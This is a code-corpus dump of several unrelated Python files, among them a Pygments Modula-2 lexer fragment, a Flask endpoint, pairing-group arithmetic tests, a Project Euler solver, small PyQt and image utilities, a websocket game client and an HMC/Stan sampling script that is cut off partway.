pim_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_proc_identifiers,\n ),\n }\n\n # Standard Library Variables Database\n stdlib_variables_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Variables for PIM Modula-2\n 'm2pim': (\n pim_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for ISO Modula-2\n 'm2iso': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_var_identifiers,\n ),\n }\n\n # Standard Library Constants Database\n stdlib_constants_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Constants for PIM Modula-2\n 'm2pim': (\n pim_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for ISO Modula-2\n 'm2iso': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_const_identifiers,\n ),\n }\n\n# M e t h o d s\n\n # initialise a lexer instance\n def __init__(self, **options):\n #\n # check dialect options\n #\n dialects = get_list_opt(options, 'dialect', [])\n #\n for dialect_option in dialects:\n if dialect_option in self.dialects[1:-1]:\n # valid dialect option found\n self.set_dialect(dialect_option)\n break\n #\n # Fallback Mode (DEFAULT)\n else:\n # no valid dialect option\n self.set_dialect('unknown')\n #\n self.dialect_set_by_tag = False\n #\n # check style options\n #\n styles = get_list_opt(options, 'style', [])\n #\n # use lowercase mode for Algol style\n if 'algol' in styles or 'algol_nu' in styles:\n self.algol_publication_mode = True\n else:\n self.algol_publication_mode = False\n #\n # Check option flags\n #\n self.treat_stdlib_adts_as_builtins = get_bool_opt(\n options, 'treat_stdlib_adts_as_builtins', True)\n #\n # call superclass initialiser\n RegexLexer.__init__(self, **options)\n\n # Set lexer to a specified dialect\n def set_dialect(self, dialect_id):\n #\n # if __debug__:\n # print 'entered set_dialect with arg: ', dialect_id\n #\n # check dialect name against known dialects\n if dialect_id not in self.dialects:\n dialect = 'unknown' # default\n else:\n dialect = dialect_id\n #\n # compose lexemes to reject set\n lexemes_to_reject_set = set()\n # add each list of reject lexemes for this dialect\n for list in 
self.lexemes_to_reject_db[dialect]:\n lexemes_to_reject_set.update(set(list))\n #\n # compose reserved words set\n reswords_set = set()\n # add each list of reserved words for this dialect\n for list in self.reserved_words_db[dialect]:\n reswords_set.update(set(list))\n #\n # compose builtins set\n builtins_set = set()\n # add each list of builtins for this dialect excluding reserved words\n for list in self.builtins_db[dialect]:\n builtins_set.update(set(list).difference(reswords_set))\n #\n # compose pseudo-builtins set\n pseudo_builtins_set = set()\n # add each list of builtins for this dialect excluding reserved words\n for list in self.pseudo_builtins_db[dialect]:\n pseudo_builtins_set.update(set(list).difference(reswords_set))\n #\n # compose ADTs set\n adts_set = set()\n # add each list of ADTs for this dialect excluding reserved words\n for list in self.stdlib_adts_db[dialect]:\n adts_set.update(set(list).difference(reswords_set))\n #\n # compose modules set\n modules_set = set()\n # add each list of builtins for this dialect excluding builtins\n for list in self.stdlib_modules_db[dialect]:\n modules_set.update(set(list).difference(builtins_set))\n #\n # compose types set\n types_set = set()\n # add each list of types for this dialect excluding builtins\n for list in self.stdlib_types_db[dialect]:\n types_set.update(set(list).difference(builtins_set))\n #\n # compose procedures set\n procedures_set = set()\n # add each list of procedures for this dialect excluding builtins\n for list in self.stdlib_procedures_db[dialect]:\n procedures_set.update(set(list).difference(builtins_set))\n #\n # compose variables set\n variables_set = set()\n # add each list of variables for this dialect excluding builtins\n for list in self.stdlib_variables_db[dialect]:\n variables_set.update(set(list).difference(builtins_set))\n #\n # compose constants set\n constants_set = set()\n # add each list of constants for this dialect excluding builtins\n for list in self.stdlib_constants_db[dialect]:\n constants_set.update(set(list).difference(builtins_set))\n #\n # update lexer state\n self.dialect = dialect\n self.lexemes_to_reject = lexemes_to_reject_set\n self.reserved_words = reswords_set\n self.builtins = builtins_set\n self.pseudo_builtins = pseudo_builtins_set\n self.adts = adts_set\n self.modules = modules_set\n self.types = types_set\n self.procedures = procedures_set\n self.variables = variables_set\n self.constants = constants_set\n #\n # if __debug__:\n # print 'exiting set_dialect'\n # print ' self.dialect: ', self.dialect\n # print ' self.lexemes_to_reject: ', self.lexemes_to_reject\n # print ' self.reserved_words: ', self.reserved_words\n # print ' self.builtins: ', self.builtins\n # print ' self.pseudo_builtins: ', self.pseudo_builtins\n # print ' self.adts: ', self.adts\n # print ' self.modules: ', self.modules\n # print ' self.types: ', self.types\n # print ' self.procedures: ', self.procedures\n # print ' self.variables: ', self.variables\n # print ' self.types: ', self.types\n # print ' self.constants: ', self.constants\n\n # Extracts a dialect name from a dialect tag comment string and checks\n # the extracted name against known dialects. 
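The composition in set_dialect always subtracts the higher-precedence set before adding to the lower one, so each identifier ends up in at most one category (a reserved word is never re-tagged as a builtin, a builtin never as a library identifier). A self-contained sketch of that pattern with made-up data:

reserved = {'IF', 'THEN'}
builtin_lists = (('ABS', 'IF'), ('CHR',))
builtins = set()
for lst in builtin_lists:
    builtins.update(set(lst).difference(reserved))
assert builtins == {'ABS', 'CHR'}  # 'IF' stays a reserved word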
If a match is found, the\n # matching name is returned, otherwise dialect id 'unknown' is returned\n def get_dialect_from_dialect_tag(self, dialect_tag):\n #\n # if __debug__:\n # print 'entered get_dialect_from_dialect_tag with arg: ', dialect_tag\n #\n # constants\n left_tag_delim = '(*!'\n right_tag_delim = '*)'\n left_tag_delim_len = len(left_tag_delim)\n right_tag_delim_len = len(right_tag_delim)\n indicator_start = left_tag_delim_len\n indicator_end = -(right_tag_delim_len)\n #\n # check comment string for dialect indicator\n if len(dialect_tag) > (left_tag_delim_len + right_tag_delim_len) \\\n and dialect_tag.startswith(left_tag_delim) \\\n and dialect_tag.endswith(right_tag_delim):\n #\n # if __debug__:\n # print 'dialect tag found'\n #\n # extract dialect indicator\n indicator = dialect_tag[indicator_start:indicator_end]\n #\n # if __debug__:\n # print 'extracted: ', indicator\n #\n # check against known dialects\n for index in range(1, len(self.dialects)):\n #\n # if __debug__:\n # print 'dialects[', index, ']: ', self.dialects[index]\n #\n if indicator == self.dialects[index]:\n #\n # if __debug__:\n # print 'matching dialect found'\n #\n # indicator matches known dialect\n return indicator\n else:\n # indicator does not match any dialect\n return 'unknown' # default\n else:\n # invalid indicator string\n return 'unknown' # default\n\n # intercept the token stream, modify token attributes and return them\n def get_tokens_unprocessed(self, text):\n for index, token, value in RegexLexer.get_tokens_unprocessed(self, text):\n #\n # check for dialect tag if dialect has not been set by tag\n if not self.dialect_set_by_tag and token == Comment.Special:\n indicated_dialect = self.get_dialect_from_dialect_tag(value)\n if indicated_dialect != 'unknown':\n # token is a dialect indicator\n # reset reserved words and builtins\n self.set_dialect(indicated_dialect)\n self.dialect_set_by_tag = True\n #\n # check for reserved words, predefined and stdlib identifiers\n if token is Name:\n if value in self.reserved_words:\n token = Keyword.Reserved\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.builtins:\n token = Name.Builtin\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.pseudo_builtins:\n token = Name.Builtin.Pseudo\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.adts:\n if not self.treat_stdlib_adts_as_builtins:\n token = Name.Namespace\n else:\n token = Name.Builtin.Pseudo\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.modules:\n token = Name.Namespace\n #\n elif value in self.types:\n token = Name.Class\n #\n elif value in self.procedures:\n token = Name.Function\n #\n elif value in self.variables:\n token = Name.Variable\n #\n elif value in self.constants:\n token = Name.Constant\n #\n elif token in Number:\n #\n # mark prefix number literals as error for PIM and ISO dialects\n if self.dialect not in ('unknown', 'm2r10', 'objm2'):\n if \"'\" in value or value[0:2] in ('0b', '0x', '0u'):\n token = Error\n #\n elif self.dialect in ('m2r10', 'objm2'):\n # mark base-8 number literals as errors for M2 R10 and ObjM2\n if token is Number.Oct:\n token = Error\n # mark suffix base-16 literals as errors for M2 R10 and ObjM2\n elif token is Number.Hex and 'H' in value:\n token = Error\n # mark real numbers with E as errors for M2 R10 and ObjM2\n elif token is Number.Float and 'E' in value:\n token = Error\n #\n elif token in Comment:\n #\n # mark single line 
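For reference, a programmatic counterpart to the pygmentize examples in the docstring above (assumes a standard Pygments installation; the Modula-2 source string is made up). Because dialect tags are checked on every Comment.Special token, an embedded tag supersedes the dialect passed as an option:

from pygments import highlight
from pygments.formatters import TerminalFormatter
from pygments.lexers.modula2 import Modula2Lexer

code = "MODULE Demo; (*!m2r10*) VAR i : INTEGER; END Demo."
lexer = Modula2Lexer(dialect='m2pim')  # superseded by the (*!m2r10*) tag
print(highlight(code, lexer, TerminalFormatter()))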
comment as error for PIM and ISO dialects\n if token is Comment.Single:\n if self.dialect not in ('unknown', 'm2r10', 'objm2'):\n token = Error\n #\n if token is Comment.Preproc:\n # mark ISO pragma as error for PIM dialects\n if value.startswith('<*') and \\\n self.dialect.startswith('m2pim'):\n token = Error\n # mark PIM pragma as comment for other dialects\n elif value.startswith('(*$') and \\\n self.dialect != 'unknown' and \\\n not self.dialect.startswith('m2pim'):\n token = Comment.Multiline\n #\n else: # token is neither Name nor Comment\n #\n # mark lexemes matching the dialect's error token set as errors\n if value in self.lexemes_to_reject:\n token = Error\n #\n # substitute lexemes when in Algol mode\n if self.algol_publication_mode:\n if value == '#':\n value = u'≠'\n elif value == '<=':\n value = u'≤'\n elif value == '>=':\n value = u'≥'\n elif value == '==':\n value = u'≡'\n elif value == '*.':\n value = u'•'\n\n # return result\n yield index, token, value\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/modula2.py","file_name":"modula2.py","file_ext":"py","file_size_in_byte":52317,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
+{"seq_id":"37512292982","text":"from flask import Flask, jsonify, request\r\nfrom flask_cors import CORS, cross_origin\r\nfrom Chart import Chart\r\n\r\n# Define a bunch of astronova API pseudofunctions for pure testing, \r\n# and to inform later updating of existing program\r\n\r\napp = Flask(__name__)\r\nCORS(app, support_credentials=True)\r\n\r\n@app.route('/query', methods=['POST'])\r\n@cross_origin(origin='*')\r\ndef query():\r\n data = request.get_json(force=True)\r\n if data is None:\r\n print(\"Didn't receive data.\")\r\n return jsonify(\"No data!\")\r\n else:\r\n location = data['inputLocation']\r\n location = location.strip()\r\n location = location.lower()\r\n\r\n birthDate = data['inputDate']\r\n birthDate = birthDate.strip()\r\n splitBirthDate = birthDate.split('/')\r\n month, day, year = (int(x) for x in splitBirthDate)\r\n \r\n birthTime = data['inputTime']\r\n splitBirthTime = birthTime.split(':')\r\n hour, minute = (int(x) for x in splitBirthTime)\r\n\r\n return jsonify([month, day, year, hour, minute, location])","repo_name":"tzmt/storage","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42258884003","text":"#!/usr/bin/env python\n\n\"\"\"\nTests for arithmetic on G1, G2, and Gt elements.\n\"\"\"\n\nfrom testcommon import *\nfrom pbc import *\nfrom timeit import timeit\nfrom unittest import TestCase, SkipTest\nimport unittest\n\n\nclass AdditiveGroupArithmetic(TestCase):\n \"\"\"\n Tests G1/G2 arithmetic\n \"\"\"\n def setUp(self):\n raise SkipTest(\"base class\")\n\n\n def additionCommutes(self):\n P, Q = self.randomElement(), self.randomElement()\n R1 = P + Q\n R2 = Q + P\n self.assertNotEqual(P, Q)\n self.assertNotEqual(R1, Q)\n self.assertEqual(R1, R2)\n\n\n def additionAssociates(self):\n P, Q, R = self.randomElement(), self.randomElement(), self.randomElement()\n T1 = (P + Q) + R\n T2 = P + (Q + R)\n self.assertEqual(T1, T2)\n\n\n def additionDistributes(self):\n Q = self.randomElement()\n a, b = randomZ(), randomZ()\n c = a + b\n\n R1 = Q*a + Q*b\n R2 = Q*c\n\n self.assertNotEqual(Q, R1)\n self.assertEqual(R1, R2)\n\n\n def largeScalarMultiply(self):\n n = self.order\n Q = self.randomElement()\n a,b = 
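A hedged smoke test for the /query endpoint above, using Flask's built-in test client (assumes the module is importable as app and that its own imports, such as Chart, resolve):

from app import app

client = app.test_client()
resp = client.post('/query', json={
    'inputLocation': ' Austin ',
    'inputDate': '7/4/1990',
    'inputTime': '12:30',
})
assert resp.get_json() == [7, 4, 1990, 12, 30, 'austin']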
randomZ(maximum=n), randomZ(maximum=n)\n c = a * b\n\n # Ensure our number is big enough for this test\n self.assertTrue(c > n)\n\n # Perform multiplication with two smaller numbers and one larger\n # number. They should give the same result and no segfaults.\n R1 = Q*a*b\n R2 = Q*c\n self.assertEqual(R1, R2)\n\n\n def testAdditionCommutes(self):\n repeat(self.additionCommutes, n=100)\n\n def testAdditionAssociates(self):\n repeat(self.additionAssociates, n=100)\n\n def testAdditionDistributive(self):\n repeat(self.additionDistributes, n=100)\n\n\n def testMultiplyReduces(self):\n Q = self.randomElement()\n a,b = randomZ(), randomZ()\n Qa = Q*a\n Qab = Qa*b\n c = a*b % self.order\n Qc = Q*c\n self.assertEqual(Qc, Qab)\n\n\n def testLargeScalarMultiply(self):\n repeat(self.largeScalarMultiply, n=1)\n\n\n def testMultiplyCommutes(self):\n \"\"\"\n Test multiplication by testing commutativity.\n \"\"\"\n g = self.randomElement()\n a = randomZ()\n b = randomZ()\n c = a*b\n\n h1 = (g*a)*b\n h2 = (g*b)*a\n h3 = g*c\n self.assertNotEqual(g, h1)\n self.assertEqual(h1, h2)\n self.assertEqual(h2, h3)\n\n\n def testInversion(self, n=100):\n \"\"\"\n Tests group element inversion by computing inverses and\n multiplying.\n \"\"\"\n def randomInv():\n g = self.randomElement()\n gInv = g.inverse()\n h = g + gInv\n self.assertTrue(h == 0)\n self.assertTrue(h+g == g)\n repeat(randomInv, n)\n\n\nclass G1Tests(AdditiveGroupArithmetic):\n \"\"\"\n Tests for G1Element arithmetic.\n \"\"\"\n def setUp(self):\n self.randomElement = randomG1\n self.order = orderG1()\n\n\nclass G2Tests(AdditiveGroupArithmetic):\n \"\"\"\n Tests for G2Element arithmetic.\n \"\"\"\n def setUp(self):\n self.randomElement = randomG2\n self.order = orderG2()\n\n def testFastMultiplyG2Correct(self):\n \"\"\"\n Tests that fast multiplication is correct by cross-checking with slow \n multiplication.\n \"\"\"\n p = randomG2()\n r = randomZ()\n q1 = p.mul_table(r)\n q2 = p.mul_basic(r)\n self.assertEqual(q1, q2)\n\n\n def testFastMultiplyG2Faster(self):\n \"\"\"\n Ensures that fast multiplication is indeed faster than basic multiply.\n \"\"\"\n p = randomG2()\n r = randomZ()\n\n fastTime = timeit(lambda:p.mul_table(r), number=100)\n basicTime = timeit(lambda:p.mul_basic(r), number=100)\n self.assertLess(fastTime, basicTime)\n\n\nclass GtTests(TestCase):\n \"\"\"\n Tests for GtElement arithmetic\n \"\"\"\n def testInverse(self):\n \"\"\"\n Verifies that ~GtElement produces a multiplicative inverse.\n \"\"\"\n def doInv():\n r = randomGt()\n rInv = ~r\n x = r * rInv\n self.assertTrue(x == 1)\n repeat(doInv, n=50)\n\n\n def testMultiplyCommutes(self):\n def test(): \n g, h = randomGt(), randomGt()\n r1 = g*h\n r2 = h*g\n self.assertNotEqual(g, r1)\n self.assertEqual(r1,r2)\n\n repeat(test, n=100)\n\n\n def testMultiplyAssociates(self):\n def test():\n f, g, h = randomGt(), randomGt(), randomGt()\n r1 = (f*g)*h\n r2 = f*(g*h)\n self.assertEqual(r1,r2)\n\n repeat(test, n=100)\n\n\n def testExpCommutes(self):\n def test():\n g = randomGt()\n a,b = randomZ(), randomZ()\n r1 = (g**a)**b\n r2 = (g**b)**a\n r3 = g**(a*b)\n c = (a*b) % orderGt()\n r4 = g**c\n self.assertEqual(r1, r2)\n self.assertEqual(r1, r3)\n self.assertEqual(r1, r4)\n\n repeat(test, n=100)\n\n\n def testExpDistributes(self):\n def test():\n g = randomGt()\n a,b = randomZ(), randomZ()\n r1 = (g**a)*(g**b)\n r2 = g**(a+b)\n self.assertEqual(r1, r2)\n\n repeat(test, n=100)\n\n\n# Run!\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"ace0/pyrelic","sub_path":"pyrelic/testPbcArith.py","file_name":"testPbcArith.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31894467393","text":"# Starting in the top left corner of a 2×2 grid,\n# and only being able to move to the right and down,\n# there are exactly 6 routes to the bottom right corner.\n#\n# ─ │\n# ━ ┃\n#\n# ━━━━━━━ ━━━━─── ━━━━───\n# │ │ ┃ │ ┃ │ │ ┃ │\n# ─────── ────━━━ ─��─────\n# │ │ ┃ │ │ ┃ │ ┃ │\n# ──────X ──────X ───━━━X\n\n# ─────── ─────── ───────\n# ┃ │ │ ┃ │ │ ┃ │ │\n# ━━━━━━━ ━━━──── ───────\n# │ │ ┃ │ ┃ │ ┃ │ │\n# ──────X ───━━━X ━━━━━━X\n#\n# How many such routes are there through a 20×20 grid?\n\n\ndef memorise(f):\n known = {}\n\n def wrapper(*args):\n if args not in known:\n known[args] = f(*args)\n return known[args]\n\n return wrapper\n\n\n@memorise\ndef routes(width, height):\n if width == 0 or height == 0:\n return 1\n\n acc = 0\n\n # this is go right\n acc += routes(width - 1, height)\n\n # go down\n acc += routes(width, height - 1)\n\n return acc\n\n\nif __name__ == '__main__':\n print(routes(20, 20))\n","repo_name":"jarredblanchette/ProjectEuler","sub_path":"problems/015/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37476327775","text":"from PyQt5.QtWidgets import QPushButton\n\n\nclass Button(QPushButton):\n def __init__(self, name, function, coordinates, size, parent=None):\n super(QPushButton, self).__init__(parent)\n self.function = function\n self.setGeometry(coordinates[0], coordinates[1], size[0], size[1])\n self.setText(name)\n self.clicked.connect(self._on_click)\n\n def _on_click(self):\n self.function()","repo_name":"samstikhin/reversi","sub_path":"gui_objects/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71076416428","text":"import io\nfrom PIL import Image\nfrom crutches_on_wheels.errors.errors import Error\nfrom configs.config import REQUEST_TIMEOUT, CONNECT_TIMEOUT\nfrom dateutil import parser\n\n\ndef convertDateTime(inputDateTime: str) -> str:\n \"\"\"\n Function convert time to UTC format if input time format is local\n\n Args:\n inputDateTime: string with date and time\n Returns:\n string with datetime in UTC, isoformat with 'Z' at the end\n \"\"\"\n if not str(inputDateTime).endswith('Z'):\n return parser.parse(inputDateTime).replace(tzinfo=None).isoformat('T') + 'Z'\n else:\n return inputDateTime\n\n\ndef checkFormatAndConvertImage(byteImg):\n \"\"\"\n Check format mimetype and image conversion, if format is not [\"image/jpg\", \"image/jpeg\", \" image/pjpeg\"]\n \n :param byteImg: byte image.\n :return: converted byte image.\n \"\"\"\n img = Image.open(io.BytesIO(byteImg))\n if img.format == 'JPEG':\n return byteImg\n else:\n output = io.BytesIO()\n img.convert('RGB').save(output, format = 'JPEG')\n return output.getvalue()\n\n\ndef generateStatsTornadoRequestError(reply, statsServer, logger):\n if reply.request_time >= CONNECT_TIMEOUT or reply.request_time >= REQUEST_TIMEOUT:\n if reply.error.message == 'Timeout while connecting':\n return logger.warning(\"Connection timeout to {}\".format(statsServer))\n else:\n return logger.warning(\"Request timeout to {}\".format(statsServer))\n logger.warning(\"Unknown errror, 
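The memoised recursion above agrees with the closed form: a route through a width x height grid is just a choice of which of the width + height moves go right, so the count is a binomial coefficient. A self-contained cross-check:

from math import comb

def routes_closed_form(width, height):
    # choose which of the width + height moves are "right"
    return comb(width + height, width)

assert routes_closed_form(2, 2) == 6
assert routes_closed_form(20, 20) == 137846528820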
stats server {}\".format(statsServer))\n\n\ndef generateRectISO(detect, landmarks):\n rect = {\"height\": 0, \"width\": 0, \"x\": 0, \"y\": 0}\n left = landmarks[0]\n right = landmarks[1]\n\n width = (right[0] - left[0]) / 0.25\n height = width / 0.75\n\n rect[\"x\"] = int(detect[\"x\"] + round((right[0] + left[0]) / 2, 0) - round(width * 0.5, 0))\n rect[\"y\"] = int(detect[\"y\"] + round((right[1] + left[1]) / 2, 0) - round(width * 0.6, 0))\n\n rect[\"width\"] = int(round(width, 0))\n rect[\"height\"] = int(round(height, 0))\n\n return rect\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-api/luna_api/app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"239661054","text":"import random\n\nText=\"AAACCCAAACCC\"\nn = len(Text)\nprofile={'A': [0.5, 0.1], 'C': [0.3, 0.2], 'G': [0.2, 0.4], 'T': [0.0, 0.3]}\nk=2\n\n\n\ndef Pr(pattern, profile):\n Profile=1\n for j in range(k):\n #print(float(profile[pattern[j]][j]))\n #print(Profile)\n Profile=Profile*float(profile[pattern[j]][j])\n #print(Profile)\n return Profile\n\ndef Normalize(Probabilities):\n all_probability=0\n for i in Probabilities.keys():\n #print(i)\n all_probability+=Probabilities[i]\n #print(all_probability)\n for j in Probabilities.keys():\n Probabilities[j]=Probabilities[j]/all_probability\n\n\n return Probabilities\n\ndef WeightedDie(Probabilities):\n tem_p=random.uniform(0,1)\n #print(tem_p)\n check_p=0\n for i in Probabilities.keys():\n if Probabilities[i]+check_p>=tem_p>=check_p:\n return i\n check_p += Probabilities[i]\n\ndef ProfileGeneratedString(Text, profile, k):\n probabilities = {}\n for i in range(0, n - k + 1):\n probabilities[Text[i:i + k]] = Pr(Text[i:i + k], profile)\n\n probabilities=Normalize(probabilities)\n\n return WeightedDie(probabilities)\n\nprint(ProfileGeneratedString(Text, profile, k))","repo_name":"Hydebutterfy/learn-python","sub_path":"message/ProfileGeneratedString(Text, profile, k).py","file_name":"ProfileGeneratedString(Text, profile, k).py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36902835921","text":"# coding:utf-8\nfrom ws4py.client.threadedclient import WebSocketClient\nimport time\nimport threading\nimport config\nimport json\n\ndirection = -1\n\nname = 'ljz'\n\nclass HumanTank(WebSocketClient):\n def opened(self):\n global name\n self.send(config.AUTH_DICT[name])\n\n def send_cmd(self, cmd):\n self.send(cmd)\n\n def closed(self, code, reason=None):\n print(\"Closed down\", code, reason)\n\n def received_message(self, m):\n result = json.loads(m.data)\n print(result['data'])\n\n\nif __name__==\"__main__\":\n try:\n ws = HumanTank(config.URL)\n ws.connect()\n match = threading.Thread(target=ws.run_forever, name=\"match\")\n match.start()\n\n time.sleep(3)\n print(\"Start match...\")\n\n except KeyboardInterrupt:\n ws.close()\n\n","repo_name":"SelfSoda/tank_rl","sub_path":"tank_manual_2.py","file_name":"tank_manual_2.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38041012581","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os\nimport json, pickle\nimport pystan\n\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = 
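The Normalize/WeightedDie pair above implements categorical sampling by walking cumulative probabilities; the standard library's random.choices does the same job and makes a handy cross-check (the probabilities below are made up and assumed already normalised):

import random

probabilities = {'AA': 0.5, 'AC': 0.3, 'CC': 0.2}
kmer = random.choices(list(probabilities),
                      weights=list(probabilities.values()))[0]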
comm.Get_size()\n\n\nsys.path.append('../src/')\nimport utils\nfrom pyhmc import PyHMC_multistep, PyHMC_multistep_tries3, PyHMC\nimport diagnostics as dg\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Run multi-step HMC sampling for a Stan model.')\nparser.add_argument('-modelname', type=str, help='Name of the model')\nparser.add_argument('--dataname', type=str, help='Name of the dataset')\nparser.add_argument('--nsamples', default=1000, type=int, help='Number of samples')\nparser.add_argument('--burnin', default=1000, type=int, help='Number of burn-in samples')\nparser.add_argument('--Tint', default=5, type=float, help='Nleapfrog*step_size')\nparser.add_argument('--step_size', default=0.01, type=float,\n help='leapfrog step size')\nparser.add_argument('--two_factor', default=2, type=float,\n help='factor by which the step size is reduced per sub-step')\n#parser.add_argument('--nchains', default=10, type=int, help='Number of chains')\nparser.add_argument('--olong', default=1, type=int, help='prob or no prob')\nparser.add_argument('--gather', default=1, type=int, help='prob or no prob')\nparser.add_argument('--vanilla', default=1, type=int, help='if 1, do vanilla HMC as well')\nparser.add_argument('--suffix', default='', type=str,\n help='suffix appended to the output folder name')\nparser.add_argument('--nutsparams', default=1, type=int,\n help='Use fit params')\n\n\n\nargs = parser.parse_args()\nmodelname = args.modelname\nprint(\"Model name : \", modelname)\n#ndim = args.ndim\n#step_size = args.step_size\ntwo_factor = args.two_factor\nnsamples = args.nsamples\nsuffix = args.suffix\nif suffix != '': suffix = '-'+suffix\n#burnin = args.burnin\nnchains = 1 #args.nchains\n\n\n##\n\nif args.olong == 1: fpath= '/mnt/ceph/users/cmodi/hmc/outputs_long/%s%s//'%(modelname, suffix)\nif args.olong == 3: fpath= '/mnt/ceph/users/cmodi/hmc/outputs_long3/%s%s//'%(modelname, suffix)\n#try: os.makedirs(fpath)\n#except Exception as e: print(e)\nprint('Output folder : ', fpath)\n\n\n#######\n\n#model\nfname = './models/%s.pkl'%modelname\nwith open(fname, 'rb') as f:\n model = pickle.load(f)\n\n#data\ntry:\n with open('modeldata/%s.json'%args.dataname, 'r') as fp:\n data = json.load(fp)\nexcept: \n try: \n with open('modeldata/%s.json'%modelname, 'r') as fp:\n data = json.load(fp)\n except: data = None\n\n#params\nif args.nutsparams:\n print('Reading parameter file at %s'%(fpath + 'params.json'))\n with open(fpath + 'params.json', 'r') as fp:\n todump = json.load(fp)\n stepsizefid = comm.bcast(todump['stepsize'], root=0)\n invmetricfid = comm.bcast(np.array(todump['invmetric']), root=0)\n Tint = comm.bcast(todump['Tintegration'], root=0)\n Nleapfrogfid = comm.bcast(todump['Nleapfrog'], root=0)\n tnamepath = False\n print('Using fid params from parameter file at %s'%(fpath + 'params.json'))\nelse:\n print('Using arguments for step size and Tint')\n stepsizefid = args.step_size\n invmetricfid = 1 #np.ones(ndim)\n Tint = args.Tint\n Nleapfrogfid = Tint/stepsizefid\n tnamepath = True\n\n#############################\n##Stansampling\n\nstansamples = model.sampling(data=data, chains=1, warmup=1, algorithm='HMC',\n iter=2*args.burnin, seed=rank, n_jobs=1,\n control={\"metric\":\"diag_e\", \n \"stepsize\":stepsizefid,\n \"int_time\":Tint,\n \"inv_metric\":invmetricfid, \n \"stepsize_jitter\":0\n })\n\nlog_prob = stansamples.log_prob\ngrad_log_prob = stansamples.grad_log_prob\n\n\nsamplesy = []\nfor key in stansamples.extract().keys() : \n y = stansamples.extract()[key]\n print(key, y.shape)\n if len(y.shape) == 
1: y = np.expand_dims(y, 1)\n samplesy.append(y)\nsamplesy = np.concatenate(samplesy[:-1], axis=1) \nsamplesy = np.expand_dims(samplesy, 1)\nndim = samplesy.shape[-1]\n\n#Initistate\nsamplesy = stansamples.extract(permuted=False)[..., ]\nos.makedirs(fpath + 'step10/initsamples', exist_ok=True)\nnp.save(fpath + 'step10/initsamples/%02d'%rank, samplesy)\n\ntmp = stansamples.extract().copy() #[args.burnin:]\nii = np.random.randint(0, stansamples.extract()['lp__'].size-args.burnin)\ncounter = 0 \nprint(\"samples shape : \", samplesy.shape)\nfor ik, key in enumerate(tmp.keys()):\n size = tmp[key][ii].size\n print(key, size)\n #tmp[key] = tmp[key][ii]\n if size > 1: \n tmp[key] = samplesy[-args.burnin:, 0, counter: counter + size].mean(axis=0)\n else: \n tmp[key] = samplesy[-args.burnin:, 0, counter].mean(axis=0)\n counter = counter + size\ntmp.pop('lp__')\ninitstate = stansamples.unconstrain_pars(tmp).reshape([nchains, ndim])\n#initstate = np.random.uniform(0.1, 1., size=nchains*ndim).reshape([nchains, ndim])\n#print(\"initstate in rank \", rank, initstate)\n\n#sys.exit()\n\n\n#############################\n###Do HMC\n\ndef samplesaves(fpathd, mysamples, accepted, probs, counts):\n\n for ff in [fpathd, fpathd + 